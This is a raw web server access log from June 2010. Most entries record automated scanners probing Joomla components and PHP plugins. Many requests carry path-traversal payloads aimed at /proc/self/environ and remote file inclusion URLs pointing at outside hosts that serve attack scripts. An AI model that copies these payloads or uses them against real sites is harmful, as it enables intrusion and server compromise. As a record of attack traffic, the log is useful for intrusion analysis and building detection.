77.222.56.62 - - [28/Jun/2010:03:36:53 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.15.198.39 - - [28/Jun/2010:03:36:57 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
77.222.56.62 - - [28/Jun/2010:03:37:08 -0500] "GET /logs/access_log.1276473600//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.252.118.175 - - [28/Jun/2010:03:40:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.118.175 - - [28/Jun/2010:03:40:43 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
117.102.100.183 - - [28/Jun/2010:03:43:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.205.67.73 - - [28/Jun/2010:03:47:41 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
67.205.67.73 - - [28/Jun/2010:03:47:41 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
195.225.170.108 - - [28/Jun/2010:03:50:21 -0500] "GET /logs//index.php?option=com_appointment&controller=http://www.porto.napoli.it/tt/data/p1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
195.225.170.108 - - [28/Jun/2010:03:50:21 -0500] "GET //index.php?option=com_appointment&controller=http://www.porto.napoli.it/tt/data/p1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
195.225.170.108 - - [28/Jun/2010:03:50:22 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=http://www.porto.napoli.it/tt/data/p1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.15.198.39 - - [28/Jun/2010:03:50:36 -0500] "GET /logs/access_log.1277164800/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.15.198.39 - - [28/Jun/2010:03:50:36 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.15.198.39 - - [28/Jun/2010:03:50:36 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
195.225.170.108 - - [28/Jun/2010:03:51:10 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=http://www.porto.napoli.it/tt/data/p1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.177.33.225 - - [28/Jun/2010:03:51:22 -0500] "GET /logs//index.php?option=com_appointment&controller=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.177.33.225 - - [28/Jun/2010:03:51:22 -0500] "GET //index.php?option=com_appointment&controller=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.177.33.225 - - [28/Jun/2010:03:51:22 -0500] "GET /logs/access_log.1277164800%20%20//index.php?option=com_appointment&controller=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.121.216.99 - - [28/Jun/2010:03:51:58 -0500] "GET /logs/access_log.1277164800/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.216.99 - - [28/Jun/2010:03:51:58 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.216.99 - - [28/Jun/2010:03:51:58 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
81.177.33.225 - - [28/Jun/2010:03:52:19 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.177.33.225 - - [28/Jun/2010:03:54:48 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.191.139.210 - - [28/Jun/2010:03:56:34 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.191.139.210 - - [28/Jun/2010:03:56:34 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.191.139.210 - - [28/Jun/2010:03:56:34 -0500] "GET /logs/access_log.1266710400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
66.191.139.210 - - [28/Jun/2010:03:56:35 -0500] "GET /logs/access_log.1266710400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
66.191.139.210 - - [28/Jun/2010:03:56:35 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
66.191.139.210 - - [28/Jun/2010:03:56:35 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.252.241 - - [28/Jun/2010:03:57:34 -0500] "GET /logs/access_log.1250121600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
79.170.195.103 - - [28/Jun/2010:03:58:46 -0500] "GET /logs/index.php?option=com_jeformcr&view=http://lynnbuildersinc.com/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Casper Bot Search"
79.170.195.103 - - [28/Jun/2010:03:58:46 -0500] "GET /index.php?option=com_jeformcr&view=http://lynnbuildersinc.com/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Casper Bot Search"
79.170.195.103 - - [28/Jun/2010:03:58:46 -0500] "GET /logs/access_log.1277164800%20%20/index.php?option=com_jeformcr&view=http://lynnbuildersinc.com/casper/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Casper Bot Search"
79.170.195.103 - - [28/Jun/2010:03:58:53 -0500] "GET /logs/access_log.1277164800/index.php?option=com_jeformcr&view=http://lynnbuildersinc.com/casper/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Casper Bot Search"
79.170.195.103 - - [28/Jun/2010:03:58:53 -0500] "GET /index.php?option=com_jeformcr&view=http://lynnbuildersinc.com/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Casper Bot Search"
79.170.195.103 - - [28/Jun/2010:03:58:53 -0500] "GET /logs/index.php?option=com_jeformcr&view=http://lynnbuildersinc.com/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Casper Bot Search"
79.170.195.103 - - [28/Jun/2010:03:59:09 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_jeformcr&view=http://lynnbuildersinc.com/casper/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Casper Bot Search"
79.170.195.103 - - [28/Jun/2010:03:59:09 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=http://lynnbuildersinc.com/casper/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Casper Bot Search"
79.170.195.103 - - [28/Jun/2010:04:00:41 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
79.170.195.103 - - [28/Jun/2010:04:01:16 -0500] "GET /logs/access_log.1277164800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
79.170.195.103 - - [28/Jun/2010:04:01:17 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
79.170.195.103 - - [28/Jun/2010:04:01:17 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
79.170.195.103 - - [28/Jun/2010:04:01:39 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:02:33 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:02:40 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:02:56 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.50.72 - - [28/Jun/2010:04:02:57 -0500] "GET /?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
87.252.2.168 - - [28/Jun/2010:04:03:00 -0500] "GET /?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
78.41.233.128 - - [28/Jun/2010:04:03:15 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:03:32 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:03:33 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [28/Jun/2010:04:03:59 -0500] "GET /logs/access_log.1201737600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.41.233.128 - - [28/Jun/2010:04:04:05 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:04:29 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
78.41.233.128 - - [28/Jun/2010:04:04:37 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:04:37 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:04:40 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:04:41 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:04:42 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:04:44 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:04:46 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
78.41.233.128 - - [28/Jun/2010:04:04:47 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:05:08 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:05:10 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:05:10 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:05:14 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:05:26 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:06:23 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:06:41 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:06:44 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:06:47 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:07:15 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:07:16 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
79.170.195.103 - - [28/Jun/2010:04:07:33 -0500] "GET //index.php?option=com_ckforms&controller=http://lynnbuildersinc.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
79.170.195.103 - - [28/Jun/2010:04:07:33 -0500] "GET /logs//index.php?option=com_ckforms&controller=http://lynnbuildersinc.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
79.170.195.103 - - [28/Jun/2010:04:07:33 -0500] "GET /logs/access_log.1274400000//index.php?option=com_ckforms&controller=http://lynnbuildersinc.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
94.247.176.194 - - [28/Jun/2010:04:07:39 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.252.2.168 - - [28/Jun/2010:04:08:14 -0500] "GET /logs/access_log.1274400000/?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.813"
87.252.2.168 - - [28/Jun/2010:04:08:15 -0500] "GET /?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
87.252.2.168 - - [28/Jun/2010:04:08:15 -0500] "GET /logs/?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11233 "-""libwww-perl/5.813"
78.41.233.128 - - [28/Jun/2010:04:08:32 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.194.51 - - [28/Jun/2010:04:08:35 -0500] "GET /artwork/womenworldtable.png HTTP/1.1" 200 41619 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
94.136.50.72 - - [28/Jun/2010:04:09:18 -0500] "GET /logs/access_log.1274400000/?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
94.136.50.72 - - [28/Jun/2010:04:09:18 -0500] "GET /?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
94.136.50.72 - - [28/Jun/2010:04:09:18 -0500] "GET /logs/?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11233 "-""libwww-perl/5.808"
94.247.176.194 - - [28/Jun/2010:04:09:38 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:09:43 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
78.41.233.128 - - [28/Jun/2010:04:10:22 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.15.198.39 - - [28/Jun/2010:04:12:57 -0500] "GET /logs/access_log.1274832000/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:04:14:27 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:04:14:39 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:04:14:44 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
174.121.216.99 - - [28/Jun/2010:04:15:19 -0500] "GET /logs/access_log.1274832000/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
207.46.204.177 - - [28/Jun/2010:04:16:10 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.247.176.194 - - [28/Jun/2010:04:16:14 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:16:15 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:16:15 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:16:57 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:16:57 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:16:58 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
78.41.233.128 - - [28/Jun/2010:04:17:08 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:17:08 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:17:08 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.46.204.177 - - [28/Jun/2010:04:17:10 -0500] "GET /logs/access_log.1191628800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.136.55.175 - - [28/Jun/2010:04:19:04 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
94.247.176.194 - - [28/Jun/2010:04:21:14 -0500] "GET /logs/access_log.1275004800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:21:14 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:21:15 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.3.150.104 - - [28/Jun/2010:04:21:15 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
81.3.150.104 - - [28/Jun/2010:04:21:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
81.3.150.104 - - [28/Jun/2010:04:21:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
81.3.150.104 - - [28/Jun/2010:04:21:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
81.3.150.104 - - [28/Jun/2010:04:21:15 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
81.3.150.104 - - [28/Jun/2010:04:21:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
81.3.150.104 - - [28/Jun/2010:04:21:15 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
81.3.150.104 - - [28/Jun/2010:04:21:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
81.3.150.104 - - [28/Jun/2010:04:21:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
81.3.150.104 - - [28/Jun/2010:04:21:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
81.3.150.104 - - [28/Jun/2010:04:21:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
81.3.150.104 - - [28/Jun/2010:04:21:16 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
91.121.21.189 - - [28/Jun/2010:04:22:18 -0500] "GET /logs/access_log.1275004800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:22:18 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:22:18 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:22:31 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:22:38 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:22:38 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:22:59 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:23:24 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [28/Jun/2010:04:23:52 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:23:58 -0500] "GET /logs/access_log.1277164800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:23:58 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:23:58 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
94.247.176.194 - - [28/Jun/2010:04:24:56 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.162.118.240 - - [28/Jun/2010:04:25:45 -0500] "GET /logs/access_log.1275696000/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:04:25:45 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:04:25:45 -0500] "GET /logs/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
94.247.176.194 - - [28/Jun/2010:04:25:49 -0500] "GET /logs/access_log.1276473600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.121.21.189 - - [28/Jun/2010:04:26:00 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.21.189 - - [28/Jun/2010:04:26:07 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.247.176.194 - - [28/Jun/2010:04:26:07 -0500] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.162.118.240 - - [28/Jun/2010:04:26:42 -0500] "GET /logs/access_log.1275696000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
69.162.118.240 - - [28/Jun/2010:04:26:42 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
